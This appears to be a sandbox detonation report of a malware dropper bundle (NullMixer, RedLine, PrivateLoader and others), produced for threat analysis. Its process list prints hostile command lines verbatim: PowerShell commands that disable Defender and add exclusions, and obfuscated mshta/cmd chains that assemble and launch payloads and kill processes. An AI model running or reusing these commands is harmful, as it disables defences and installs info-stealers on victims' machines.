Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 272

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$601E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp" /SL5="$3018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 456

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

Network


Files

\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurl.dll

\Users\Admin\AppData\Local\Temp\7zSC12262D6\libstdc++-6.dll

\Users\Admin\AppData\Local\Temp\7zSC12262D6\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe

\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P156RKKE6NHSISTNHGDL.temp

C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp

C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\_isetup\_shfoldr.dll

C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\idp.dll

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

\Users\Admin\AppData\Local\Temp\7zSC12262D6\libwinpthread-1.dll

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload


Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload


Redline family

redline

OnlyLogger payload


Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe N/A
